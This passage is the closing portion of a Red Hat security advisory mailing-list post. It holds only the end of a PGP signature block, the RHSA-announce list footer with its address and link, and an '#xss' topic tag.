3iSh+hVwxY9pzNZVMlwtDHhw8dqvgw7JimToy8vOldgK0MdndwtVmKsKsRzu7HyL  
PQSvcN5lSv1X5FR2tnx9LMQXX1qn0P1d/8gTiRFm8Oabjx2r8I0/HNgnJpTSVSBO  
DXjKFDmwpiT+6tupM39ZbWek2hh+PoyMZJb/d6/YTND6VNlzUypq+DFtLILEaM8Z  
OjWz0YAL8/ihvhq0vSdFSMFcYKSWAOXA+6pSqe7N7WtB9hl0r7sLUaRSRHti1Ime  
uF/GLDTKkPw=8zTJ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#xss